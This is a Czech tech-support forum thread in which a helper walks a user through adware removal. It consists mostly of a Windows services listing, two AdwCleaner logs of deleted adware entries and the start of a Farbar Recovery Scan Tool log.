S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 DcpSvc;@%SystemRoot%\system32\dcpsvc.dll,-3001; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 DevQueryBroker;@%SystemRoot%\system32\DevQueryBroker.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 diagnosticshub.standardcollector.service;@%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-10-30 31744]
S3 DmEnrollmentSvc;@%systemroot%\system32\Windows.Internal.Management.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 dmwappushservice;@%SystemRoot%\system32\dmwappushsvc.dll,-200; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 DsSvc;@%SystemRoot%\system32\dssvc.dll,-10003; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 embeddedmode;@%SystemRoot%\system32\embeddedmodesvc.dll,-200; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 EntAppSvc;@EnterpriseAppMgmtSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2015-10-24 43696]
S3 gupdatem;Google Update Service (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01 144200]
S3 icssvc;@%SystemRoot%\System32\tetheringservice.dll,-4097; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService;@%SystemRoot%\system32\MessagingService.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_12577d78;MessagingService_12577d78; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_1b6073d;MessagingService_1b6073d; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_1f4d24ff;MessagingService_1f4d24ff; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_2391db7;MessagingService_2391db7; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_3f297;MessagingService_3f297; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_471b55;MessagingService_471b55; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_549d0;MessagingService_549d0; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_5b268ed;MessagingService_5b268ed; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_9fe0c8f;MessagingService_9fe0c8f; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 MessagingService_e5cea;MessagingService_e5cea; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 NetSetupSvc;@%SystemRoot%\system32\NetSetupSvc.dll,-3; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 NgcCtnrSvc;@%SystemRoot%\System32\NgcCtnrSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 NgcSvc;@%SystemRoot%\System32\ngcsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2011-07-20 440696]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2014-07-19 150600]
S3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2014-07-19 5132888]
S3 PhoneSvc;@%SystemRoot%\system32\PhoneserviceRes.dll,-10000; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc;@%SystemRoot%\system32\UserDataAccessRes.dll,-15001; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_12577d78;Contact Data_12577d78; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_1b6073d;Contact Data_1b6073d; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_1f4d24ff;Contact Data_1f4d24ff; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_2391db7;Contact Data_2391db7; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_471b55;Contact Data_471b55; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_549d0;Contact Data_549d0; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_5b268ed;Contact Data_5b268ed; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_9fe0c8f;Contact Data_9fe0c8f; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 PimIndexMaintenanceSvc_e5cea;Contact Data_e5cea; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 RetailDemo;@%SystemRoot%\System32\RDXService.dll,-256; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S3 SensorDataService;@%SystemRoot%\system32\SensorDataService.exe,-101; C:\WINDOWS\System32\SensorDataService.exe [2015-10-30 1297408]
S3 SensorService;@%SystemRoot%\System32\sensorservice.dll,-1000; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 SmsRouter;@%SystemRoot%\System32\SmsRouterSvc.dll,-10001; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 SwitchBoard;SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
S4 CDPSvc;@%SystemRoot%\system32\cdpsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S4 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology; C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2009-10-02 13336]
S4 LMS;Intel(R) Management and Security Application Local Management Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe [2009-09-30 262144]

[Rudy]

Zdravím!
Spusťte tuto utilitu:

Stáhněte AdwCleaner http://general-changelog-team.fr/fr/dow ... adwcleaner
Uložte na plochu
Ukončete všechny programy
Klikněte nejprve na >Scan< a pak na >Clean<.
Proběhne skenováni a pak se objeví log, který sem vložte.

[boutek]

# AdwCleaner v5.037 - Logfile created 29/02/2016 at 01:31:13
# Updated 28/02/2016 by Xplode
# Database : 2016-02-28.2 [Server]
# Operating system : Windows 10 Home (x64)
# Username : Administrator - MICK
# Running from : C:\Users\Administrator\Downloads\adwcleaner_5.037.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : ClaraUpdater
[-] Service Deleted : TheCalendarService
[-] Service Deleted : MPCProtectService
[-] Service Deleted : MPCKpt
[-] Service Deleted : rowugoqo
[-] Service Deleted : tygificuzbt

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files\BubbleSound
[-] Folder Deleted : C:\Program Files\shopperz280220162342
[-] Folder Deleted : C:\Program Files (x86)\CalendarTool
[#] Folder Deleted : C:\Program Files (x86)\MPC Cleaner
[-] Folder Deleted : C:\Program Files (x86)\SystemHealer
[-] Folder Deleted : C:\Program Files (x86)\F3EB8A44-1456707589-DF11-89F1-705AB685B0D8
[-] Folder Deleted : C:\Program Files (x86)\mbot_en_037050252
[!] Folder Not Deleted : C:\Program Files (x86)\mbot_en_037050252
[-] Folder Deleted : C:\Program Files (x86)\Common Files\ClaraUpdater
[-] Folder Deleted : C:\ProgramData\7c4ad7d1-47d5-1
[-] Folder Deleted : C:\ProgramData\7c4ad7d1-6367-0
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyBestOffersToday
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
[-] Folder Deleted : C:\Users\ADMINI~1\AppData\Local\Temp\MPC
[-] Folder Deleted : C:\Users\Administrator\AppData\Local\BoBrowser
[-] Folder Deleted : C:\Users\Administrator\AppData\Local\mbot_en_037050252
[-] Folder Deleted : C:\Users\Administrator\AppData\Local\F3EB8A44-1456707665-DF11-89F1-705AB685B0D8
[!] Folder Not Deleted : C:\Users\Administrator\AppData\Local\mbot_en_037050252
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\ASPackage
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\CalendarTool
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\DesktopIconForAmazon
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\System Healer
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BoBrowser
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BubbleSound 1.0
[-] Folder Deleted : C:\Users\Public\Documents\Guid
[-] Folder Deleted : C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\CalendarTool

***** [ Files ] *****

[-] File Deleted : C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BoBrowser.lnk
[-] File Deleted : C:\Users\Administrator\Desktop\BoBrowser.lnk
[-] File Deleted : C:\Users\Administrator\Desktop\Facebook.lnk
[-] File Deleted : C:\Users\Administrator\Desktop\Youtube.lnk
[-] File Deleted : C:\WINDOWS\SysNative\drivers\MPCKpt.sys

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : Run_Bobby_Browser
[-] Task Deleted : crash_service
[-] Task Deleted : CGN
[-] Task Deleted : SystemHealer Monitor
[-] Task Deleted : SystemHealer Run Delay
[-] Task Deleted : System HealerStartUp
[-] Task Deleted : System HealerPeriod
[-] Task Deleted : System Healer Task

***** [ Registry ] *****

[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\bobrowser.exe
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\bobrowser.exe
[-] Key Deleted : HKLM\SOFTWARE\shopperz280220162342
[-] Key Deleted : HKCU\Software\Classes\CLSID\19041B6B-8F97-4669-BA21-C17572737ED2
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{08ACFB57-8187-47F0-AF93-56360D03634A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{08ACFB57-8187-47F0-AF93-56360D03634A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{1386F2A3-FEB9-4C55-AD9A-B798EE57299B}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{7FDF7A92-F901-4F93-9769-A8AC41C8E563}
[-] Key Deleted : HKCU\Software\BoBrowser
[-] Key Deleted : HKCU\Software\DAILYPCCLEAN
[-] Key Deleted : HKCU\Software\Microsoft\Tinstalls
[-] Key Deleted : HKCU\Software\OCS
[-] Key Deleted : HKCU\Software\System Healer
[-] Key Deleted : HKCU\Software\Tutorials
[-] Key Deleted : HKCU\Software\TutoTag
[-] Key Deleted : HKLM\SOFTWARE\Clara
[-] Key Deleted : HKLM\SOFTWARE\MPC
[-] Key Deleted : HKLM\SOFTWARE\MyBestOffersToday
[-] Key Deleted : HKLM\SOFTWARE\Tutorials
[!] Key Not Deleted : HKLM\SOFTWARE\shopperz280220162342
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\BoBrowser
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoftwareUpdater
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemHealer
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_en_037050252_is1
[!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_en_037050252_is1
[-] Key Deleted : [x64] HKLM\SOFTWARE\BubbleSound
[-] Key Deleted : [x64] HKLM\SOFTWARE\CALENDARTOOL
[-] Key Deleted : [x64] HKLM\SOFTWARE\shopperz280220162342
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BubbleSound
[-] Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{2AECBDE3-9942-45AA-AA51-E1E173654A72}]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{189dc22a-2db7-4785-a16e-e540d7ea563b} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1e13f6b7-24ec-49f1-935e-50c1fab14810} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{23ae6351-303d-4c0c-9490-e8f36d548c51} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{661955d7-1fc7-4363-af16-3a3984be281f} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{70b8dae5-6e0b-44b4-a454-4c5f6bb1f8f2} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{83f30b39-a53c-11e5-84d2-806e6f6e6963} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{86cca158-1b13-41c4-89df-b3fdb04a5c0f} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8e5be6bc-1278-4353-bbe1-4ec4f2aa6d9b} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{a472971b-8435-4511-aead-907167eb2c85} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{b91c2254-4ba6-4364-abf9-4f878a887fef} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{d7117da5-93ec-4adb-b085-9661d608445d} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{f8047a8d-9903-422a-9281-49ad68b13c97} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{189dc22a-2db7-4785-a16e-e540d7ea563b} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{1e13f6b7-24ec-49f1-935e-50c1fab14810} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{23ae6351-303d-4c0c-9490-e8f36d548c51} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{661955d7-1fc7-4363-af16-3a3984be281f} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{70b8dae5-6e0b-44b4-a454-4c5f6bb1f8f2} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{83f30b39-a53c-11e5-84d2-806e6f6e6963} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{86cca158-1b13-41c4-89df-b3fdb04a5c0f} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8e5be6bc-1278-4353-bbe1-4ec4f2aa6d9b} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{a472971b-8435-4511-aead-907167eb2c85} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{b91c2254-4ba6-4364-abf9-4f878a887fef} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{d7117da5-93ec-4adb-b085-9661d608445d} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{f8047a8d-9903-422a-9281-49ad68b13c97} [NameServer]
[-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [3D BubbleSound]
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [bobrowser]
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [CrashService]
[-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [IDSCPRODUCT]
[-] Key Deleted : HKCU\Software\Classes\TornTvDownloader.File

***** [ Web browsers ] *****


*************************

:: "Tracing" keys removed
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [9975 bytes] - [29/02/2016 01:31:13]
C:\AdwCleaner\AdwCleaner[C8].txt - [2204 bytes] - [02/10/2015 19:06:37]
C:\AdwCleaner\AdwCleaner[R0].txt - [9319 bytes] - [16/12/2013 22:33:23]
C:\AdwCleaner\AdwCleaner[R1].txt - [4665 bytes] - [08/02/2014 19:55:11]
C:\AdwCleaner\AdwCleaner[R2].txt - [13515 bytes] - [07/11/2014 20:54:46]
C:\AdwCleaner\AdwCleaner[R3].txt - [1358 bytes] - [09/11/2014 16:01:24]
C:\AdwCleaner\AdwCleaner[R4].txt - [3582 bytes] - [18/11/2014 20:32:21]
C:\AdwCleaner\AdwCleaner[R5].txt - [1818 bytes] - [07/12/2014 20:04:14]
C:\AdwCleaner\AdwCleaner[R6].txt - [25215 bytes] - [04/05/2015 16:39:06]
C:\AdwCleaner\AdwCleaner[S0].txt - [9151 bytes] - [16/12/2013 22:36:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [15472 bytes] - [08/02/2014 19:56:18]
C:\AdwCleaner\AdwCleaner[S2].txt - [12376 bytes] - [07/11/2014 20:57:15]
C:\AdwCleaner\AdwCleaner[S3].txt - [1419 bytes] - [09/11/2014 16:05:53]
C:\AdwCleaner\AdwCleaner[S4].txt - [3386 bytes] - [18/11/2014 20:35:42]
C:\AdwCleaner\AdwCleaner[S5].txt - [2036 bytes] - [07/12/2014 20:06:42]
C:\AdwCleaner\AdwCleaner[S6].txt - [6430 bytes] - [04/05/2015 16:42:55]
C:\AdwCleaner\AdwCleaner[S8].txt - [2042 bytes] - [02/10/2015 19:04:59]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [11220 bytes] ##########
# AdwCleaner v5.112 - Logfile created 21/04/2016 at 20:42:55
# Updated 17/04/2016 by Xplode
# Database : 2016-04-19.5 [Server]
# Operating system : Windows 10 Home (X64)
# Username : Administrator - MICK
# Running from : C:\Users\Administrator\Downloads\adwcleaner_5.112.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : MPCProtectService
[-] Service Deleted : MPCKpt

***** [ Folders ] *****

[#] Folder Deleted : C:\Program Files (x86)\MPC Cleaner
[-] Folder Deleted : C:\Program Files (x86)\OneSystemCare
[-] Folder Deleted : C:\Program Files (x86)\Hostify
[-] Folder Deleted : C:\ProgramData\b2bd49a5-02e1-1
[-] Folder Deleted : C:\ProgramData\b2bd49a5-37a1-0
[#] Folder Deleted : C:\ProgramData\Application Data\b2bd49a5-02e1-1
[#] Folder Deleted : C:\ProgramData\Application Data\b2bd49a5-37a1-0
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
[-] Folder Deleted : C:\Users\Administrator\AppData\Roaming\One System Care

***** [ Files ] *****

[-] File Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage
[-] File Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage-journal
[-] File Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
[-] File Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage-journal
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal
[-] File Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage
[-] File Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage-journal
[-] File Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
[-] File Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.mpc.am_0.localstorage-journal
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
[!] File Not Deleted : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal
[-] File Deleted : C:\Users\Administrator\Desktop\Hostify.lnk
[-] File Deleted : C:\Users\Public\Desktop\Launch One System Care.lnk
[-] File Deleted : C:\Users\Public\Desktop\MPC Cleaner.lnk
[!] File Not Deleted : C:\WINDOWS\SysNative\drivers\MPCKpt.sys

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : One System CarePeriod
[-] Task Deleted : One System Care Run Delay
[-] Task Deleted : One System Care Monitor
[-] Task Deleted : One System Care Task

***** [ Registry ] *****

[-] Value Deleted : HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [SystemCash.exe]
[-] Value Deleted : HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [SystemCash.exe]
[-] Key Deleted : HKLM\SOFTWARE\Classes\Applications\iLividSetupV1 (1).exe
[-] Key Deleted : HKLM\SOFTWARE\Classes\TornTvDownloader.File
[-] Key Deleted : HKCU\Software\One System Care
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\MICROSOFT\OTUT
[-] Key Deleted : HKCU\Software\MICROSOFT\IDSC
[-] Key Deleted : HKLM\SOFTWARE\MPC
[-] Key Deleted : HKLM\SOFTWARE\Wizzlabs
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneSystemCare
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hostify_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Data Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Data Restored : HKU\S-1-5-21-4246815794-1745546178-596238576-500\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\bestpriceninja.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pstatic.bestpriceninja.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com

***** [ Web browsers ] *****


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [17916 bytes] - [29/02/2016 02:31:13]
C:\AdwCleaner\AdwCleaner[C8].txt - [2204 bytes] - [02/10/2015 20:06:37]
C:\AdwCleaner\AdwCleaner[R0].txt - [9319 bytes] - [16/12/2013 23:33:23]
C:\AdwCleaner\AdwCleaner[R1].txt - [4665 bytes] - [08/02/2014 20:55:11]
C:\AdwCleaner\AdwCleaner[R2].txt - [13515 bytes] - [07/11/2014 21:54:46]
C:\AdwCleaner\AdwCleaner[R3].txt - [1358 bytes] - [09/11/2014 17:01:24]
C:\AdwCleaner\AdwCleaner[R4].txt - [3582 bytes] - [18/11/2014 21:32:21]
C:\AdwCleaner\AdwCleaner[R5].txt - [1818 bytes] - [07/12/2014 21:04:14]
C:\AdwCleaner\AdwCleaner[R6].txt - [25215 bytes] - [04/05/2015 17:39:06]
C:\AdwCleaner\AdwCleaner[S0].txt - [9151 bytes] - [16/12/2013 23:36:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [23517 bytes] - [08/02/2014 20:56:18]
C:\AdwCleaner\AdwCleaner[S2].txt - [12376 bytes] - [07/11/2014 21:57:15]
C:\AdwCleaner\AdwCleaner[S3].txt - [1419 bytes] - [09/11/2014 17:05:53]
C:\AdwCleaner\AdwCleaner[S4].txt - [3386 bytes] - [18/11/2014 21:35:42]
C:\AdwCleaner\AdwCleaner[S5].txt - [2036 bytes] - [07/12/2014 21:06:42]
C:\AdwCleaner\AdwCleaner[S6].txt - [6430 bytes] - [04/05/2015 17:42:55]
C:\AdwCleaner\AdwCleaner[S8].txt - [2042 bytes] - [02/10/2015 20:04:59]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [19162 bytes] ##########

[Rudy]

Teď dejte log FRST: http://forum.viry.cz/viewtopic.php?f=13&t=133100 .

[boutek]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:18-04-2016
Ran by Administrator (2016-04-22 20:53:34)
Running from C:\Users\Administrator\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-18 04:43:06)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-4246815794-1745546178-596238576-500 - Administrator - Enabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-4246815794-1745546178-596238576-503 - Limited - Disabled)
Guest (S-1-5-21-4246815794-1745546178-596238576-501 - Limited - Disabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-4246815794-1745546178-596238576-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
